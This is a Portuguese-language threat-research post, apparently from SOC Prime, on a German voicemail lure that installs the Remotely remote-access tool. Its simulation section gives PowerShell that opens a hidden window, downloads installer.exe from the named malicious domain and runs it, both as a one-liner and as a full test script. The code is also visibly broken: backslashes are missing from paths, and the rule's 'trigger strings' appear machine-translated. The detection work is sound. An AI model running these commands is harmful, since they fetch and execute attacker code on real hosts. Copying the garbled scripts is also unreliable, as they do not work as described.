SOC Prime Bias: Médio

06 Feb 2026 16:41 UTC

Armadilha do Correio de Voz: Isca de Correio de Voz em Alemão Leva a Acesso Remoto

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Armadilha do Correio de Voz: Isca de Correio de Voz em Alemão Leva a Acesso Remoto
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Atores maliciosos estão hospedando páginas de destino em alemão de “correio de voz” que atraem os usuários a baixar um arquivo BAT. O script reproduz um áudio enganoso enquanto instala silenciosamente a legítima ferramenta de monitoramento remoto Remotely. Uma vez implantado, o agente RMM oferece ao invasor acesso remoto persistente através de uma infraestrutura C2 controlada pelo invasor.

Investigação

Censys identificou 86 propriedades web comprometidas em domínios *.cadillac.ps distribuindo o arquivo BAT malicioso. O script invoca um instalador PowerShell hospedado em remotely.billbutterworth.com, que obtém um pacote ZIP do Remotely. O arquivo contém os componentes do agente Remotely e um serviço que se instala em C:Program FilesRemotely.

Mitigação

Bloquear os domínios *.cadillac.ps e remotely.billbutterworth.com na camada DNS/proxy. Treinar os usuários a não executarem arquivos BAT inesperados ou copiar/colar comandos PowerShell de páginas desconhecidas. Implantar controles de endpoint para detectar a criação de serviço Remotely e caminhos de instalação suspeitos ou ferramentas não assinadas.

Resposta

Alertar sobre a criação do Remotely_Service e a presença do Remotely_Agent.exe em Program Files. Procurar por voicemail.bat e a atividade do instalador PowerShell associado. Isolar os hosts afetados, coletar artefatos forenses e rotacionar/revogar quaisquer credenciais ou tokens utilizados pelo agente RMM.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: A Verificação de Pré-voo de Telemetria & Linha Base deve ter sido aprovada.

Racional: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.

  • Narrativa & Comandos de Ataque:

    1. Entrega de Phishing: O atacante envia um e-mail com um anexo isca de correio de voz em alemão (HTML) que, quando aberto, redireciona a vítima para http://bannerbank.cadillac.ps/voicemail.html.
    2. Execução da Página de Destino: A página de destino hospeda um comando PowerShell de uma linha que baixa e executa um instalador de ferramenta de gerenciamento remoto (RMM).
    3. Criação de Processo: Quando o navegador da vítima processa a página, o PowerShell é invocado com uma linha de comando que explicitamente inclui os dois strings que a regra observa.
    4. Telemetria Resultante: Os logs do Windows registram o ID do Evento 4688 com um CommandLine contendo ambos “página de destino com tema de correio de voz” and “bannerbank.cadillac.ps”, satisfazendo assim a condição Sigma.

    O comando exato usado para a simulação:

    # Execução maliciosa simulada – contém ambas as strings de gatilho
    Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"Write-Host 'página de destino com tema de correio de voz'; Invoke-WebRequest -Uri 'http://bannerbank.cadillac.ps/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe`""
  • Script de Teste de Regressão: Um script PowerShell autossuficiente que reproduz o ataque e pode ser executado em qualquer host Windows com o registro necessário ativado.

    <#
    .SYNOPSIS
        Simula a isca de correio de voz em alemão que aciona a regra de detecção Sigma.
    .DESCRIPTION
        Executa uma linha de comando PowerShell contendo ambas as substrings necessárias.
    #>
    
    # Definir strings maliciosas
    $lureText = "página de destino com tema de correio de voz"
    $maliciousDomain = "bannerbank.cadillac.ps"
    
    # Construir a linha única que aparecerá na linha de comando
    $payload = @"
    Write-Host '$lureText';
    Invoke-WebRequest -Uri 'http://$maliciousDomain/installer.exe' -OutFile $env:TEMPinstaller.exe;
    Start-Process $env:TEMPinstaller.exe
    "@
    
    # Iniciar o PowerShell com a linha de comando criada
    $psArgs = "-NoProfile -WindowStyle Hidden -Command `"$payload`""
    Write-Host "Lançando comando malicioso do PowerShell..."
    Start-Process -FilePath "powershell.exe" -ArgumentList $psArgs -PassThru
    
    # Opcional: esperar alguns segundos para garantir o registro
    Start-Sleep -Seconds 5
  • Comandos de Limpeza: Remover o instalador baixado e quaisquer processos residuais.

    # Parar qualquer processo de instalador residual
    Get-Process -Name "installer" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Excluir o arquivo de instalador temporário
    $installerPath = "$env:TEMPinstaller.exe"
    if (Test-Path $installerPath) {
        Remove-Item $installerPath -Force
        Write-Host "Limpou $installerPath"
    }